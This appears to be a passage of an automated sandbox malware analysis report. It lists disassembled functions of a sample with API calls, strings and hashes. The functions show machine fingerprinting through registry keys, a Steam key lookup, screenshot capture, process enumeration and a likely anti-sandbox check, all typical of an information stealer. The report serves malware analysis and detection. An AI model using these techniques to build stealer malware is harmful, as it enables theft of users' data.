                                                                                                                                                                                                                                                                          • API ID: OpenQueryValue
                                                                                                                                                                                                                                                                          • String ID: CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 11
                                                                                                                                                                                                                                                                          • API String ID: 4153817207-605346811
                                                                                                                                                                                                                                                                          • Opcode ID: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
                                                                                                                                                                                                                                                                          • Instruction ID: 4649c964c2ac6d4717e2a874ab9f529b914844d538cc1ef61ec3e528cde88b08
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aaa862363c138dd117f4ecf712ec1ac62396a79aeccf81f347b4313aefc6d95
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C11B271340310BBE7206B60EC4AF5BBAAAEB84B56F10402AF345E71E1C6B45C80CB99
                                                                                                                                                                                                                                                                          Function 00417270 Relevance: 10.0, APIs: 3, Strings: 2, Instructions: 1231stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                            • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                            • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 004175AD
                                                                                                                                                                                                                                                                            • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                            • Part of subcall function 004132F0: strtok_s.MSVCRT ref: 00413335
                                                                                                                                                                                                                                                                            • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412C64
                                                                                                                                                                                                                                                                            • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412CA9
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,?,?,?,?), ref: 00417C10
                                                                                                                                                                                                                                                                            • Part of subcall function 00412E50: strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                            • Part of subcall function 00412F60: strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                            • Part of subcall function 00414FE0: RegOpenKeyExA.KERNEL32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • C:\ProgramData\, xrefs: 0041756F
                                                                                                                                                                                                                                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 00417C0B
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: strtok_s$Heap$AllocCreateDirectoryInformationNameOpenProcessUserVolumelstrlen
                                                                                                                                                                                                                                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890$C:\ProgramData\
                                                                                                                                                                                                                                                                          • API String ID: 4167899144-1067945926
                                                                                                                                                                                                                                                                          • Opcode ID: 253828e2193622bca8c3790444a1af86ecf04706f1a61c859db2bb880bb83f3a
                                                                                                                                                                                                                                                                          • Instruction ID: d3f20ebcfaa0f86e13ddee9407f56ad69643857b77905c87f50bde3cae6408d9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 253828e2193622bca8c3790444a1af86ecf04706f1a61c859db2bb880bb83f3a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43C2A331C10B599BDB11EFB5C9815EEB378BF18308F00964EE85567142EB78BAC9CB94
                                                                                                                                                                                                                                                                          Function 00416B40 Relevance: 9.3, APIs: 3, Strings: 3, Instructions: 258stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: strstr$lstrlen
                                                                                                                                                                                                                                                                          • String ID: ERROR$steamcommunity.com$t.me
                                                                                                                                                                                                                                                                          • API String ID: 822863568-5696879
                                                                                                                                                                                                                                                                          • Opcode ID: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                          • Instruction ID: d2cef3e00896b903973622f9bff644efbf55bb675c2f2304de14bb25205f25c7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CA1C131900619ABCF05EFA1C9958EEB775BF58308F00814AF8056B152EF7CAAD5CBD5
                                                                                                                                                                                                                                                                          Function 00401000 Relevance: 9.1, APIs: 6, Instructions: 51memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,004185DE), ref: 00401005
                                                                                                                                                                                                                                                                          • VirtualAllocExNuma.KERNEL32 ref: 00401025
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32 ref: 0040103D
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401063
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 0040107D
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00401089
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocProcess$CurrentExitFreeNumamemset
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1822673426-0
                                                                                                                                                                                                                                                                          • Opcode ID: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                          • Instruction ID: 70da7db2db91f88941c3e71440bfa6ebbd6eb466aaac7195974b89fd4c7015d6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA01D431A0665457E3102B386C09BEFB794AF16705F505538F888A2271EB20898586E9
                                                                                                                                                                                                                                                                          Function 00411760 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 187COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041179A
                                                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 00411847
                                                                                                                                                                                                                                                                          • CloseWindow.USER32(?), ref: 0041199A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CloseCreateGlobalStreamWindowmalloc
                                                                                                                                                                                                                                                                          • String ID: image/jpeg$screenshot.jpg
                                                                                                                                                                                                                                                                          • API String ID: 1619257637-3715547155
                                                                                                                                                                                                                                                                          • Opcode ID: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                          • Instruction ID: ee18476c3b49a6e7ea655472561b7fd097213a4b83d20557ae7d52cec962e0ac
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbd9f64fb0aa9104faf8379c29acdbf43410a5c7dd22b002181252473fb5666b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6713D71900619EFDF04AFA0DD89AEEBB79FF08304F005019FA16A7161DB759985CBE4
                                                                                                                                                                                                                                                                          Function 00411120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                          • CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CharOpenQueryValue
                                                                                                                                                                                                                                                                          • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                          • API String ID: 3174779972-1211650757
                                                                                                                                                                                                                                                                          • Opcode ID: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                          • Instruction ID: 74cc808a3cf8f870bdb796636e5c792b2cd0ecd8dddfbe9d76d68e0a257a884b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8214521D1C7C296E360CB10CD557FBB7A4ABF6348F11A71EB5CC51072EAB061D48342
                                                                                                                                                                                                                                                                          Function 00410540 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                                                                                                          • String ID: %08lX%04lX%lu$:\$C
                                                                                                                                                                                                                                                                          • API String ID: 2039140958-545181305
                                                                                                                                                                                                                                                                          • Opcode ID: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                          • Instruction ID: daccc5cf811b00eb36f485bb9bb5cfb034b4705064687d02f987ca2459062bbc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6141D4705083107BD301BB718C85BBF7AE99FC5784F00491EF58597291EBBC99829BAA
                                                                                                                                                                                                                                                                          Function 00410B30 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33registryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • ProcessorNameString, xrefs: 00410B7C
                                                                                                                                                                                                                                                                          • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00410B5E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: OpenQueryValue
                                                                                                                                                                                                                                                                          • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                                                                                                                                                                                                                          • API String ID: 4153817207-2804670039
                                                                                                                                                                                                                                                                          • Opcode ID: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                          • Instruction ID: 414338a11f3689f75f6fdb63b0f136fa5a8568cc8c95f28b9b39ab38a5685d7b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04F08230784320BBD3106B24AC0AF5A7A99AB45B51F504029F685A71E1D6A06C508BD5
                                                                                                                                                                                                                                                                          Function 00402790 Relevance: 6.1, APIs: 4, Instructions: 104networkCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                          • InternetCrackUrlA.WININET(00000000,00000000,00000000,?,?,?,00416A04,?,?,00416A04), ref: 004028FA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CrackInternet
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1381609488-0
                                                                                                                                                                                                                                                                          • Opcode ID: eb32d055481cfcfea5bcf2ec92b33cade9e980cf0e98d2aab512a40ed34b2186
                                                                                                                                                                                                                                                                          • Instruction ID: 62d16cf430872f387fa1639693609a914c0cef2d6ed42a20a6b15e59f3bc2f55
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb32d055481cfcfea5bcf2ec92b33cade9e980cf0e98d2aab512a40ed34b2186
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9516AA01083C089EB46DF29D4E97477E955B26318F1982D9DC880F2CBC3BAC558C7FA
                                                                                                                                                                                                                                                                          Function 00411ED0 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00411F2F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 420147892-0
                                                                                                                                                                                                                                                                          • Opcode ID: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                          • Instruction ID: 12a5467778ca0c5a55c84e6a3ebf7af38e155dcebc9527c53f9d4ce48d6bebb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33F06D312052156BE3201B22EC08FABBBECEF86795F04142DF549D6260DB289852C7B5
                                                                                                                                                                                                                                                                          Function 00410700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                            • Part of subcall function 00411E60: malloc.MSVCRT ref: 00411E71
                                                                                                                                                                                                                                                                            • Part of subcall function 00411E60: strncpy.MSVCRT ref: 00411E82
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentProfilemallocmemsetstrncpy
                                                                                                                                                                                                                                                                          • String ID: Unknown
                                                                                                                                                                                                                                                                          • API String ID: 3692255074-1654365787
                                                                                                                                                                                                                                                                          • Opcode ID: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                          • Instruction ID: 9523786d007b465f85d219b7e39a8a5dfbdd483b20afe91046872d233f87955e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9201A5313003187BD620B6629C56FEF775E9FC5758F04082EB9455B282DEBCA8C587AA
                                                                                                                                                                                                                                                                          Function 00413E50 Relevance: 4.6, APIs: 3, Instructions: 112sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4198075804-0
                                                                                                                                                                                                                                                                          • Opcode ID: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                          • Instruction ID: b65bf78c018c26f30e4a94ab22d84a19a40ae7d672281f86a08f23e214b62c4f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA41B1312143409FD314EF61D895BDEB3E9ABC8304F40481EF48A97291DBBCAD89CB66
                                                                                                                                                                                                                                                                          Function 004076B0 Relevance: 4.6, APIs: 3, Instructions: 74filememoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$AllocCreateLocalRead
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3093261258-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6e03da7bb686982697c9352cba9d24d53c2a6859cb69aed1fdb7ab7d2ece8e95
                                                                                                                                                                                                                                                                          • Instruction ID: 57bb2ce498e656ac9101d6a6683512ef7afea4cd211be1053fa5c26a8075d75e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e03da7bb686982697c9352cba9d24d53c2a6859cb69aed1fdb7ab7d2ece8e95
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF21DE75204B009FC320EF64C984A6AB7F5FF89354F00482DF996CB2A0D735B945CBA2
                                                                                                                                                                                                                                                                          Function 00410FE0 Relevance: 4.6, APIs: 3, Instructions: 62processCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Process32$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1238713047-0
                                                                                                                                                                                                                                                                          • Opcode ID: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                          • Instruction ID: ad10719cd445ab04cf283b63720ee16ebf2a6e79acd2848d50ffecdf406f3b24
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 571182743002146FD7106B62AC89FFFBB9DEFC9754F04542EB50A86291DE7C9884C6A6
                                                                                                                                                                                                                                                                          Function 00411FA0 Relevance: 4.6, APIs: 3, Instructions: 59processCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
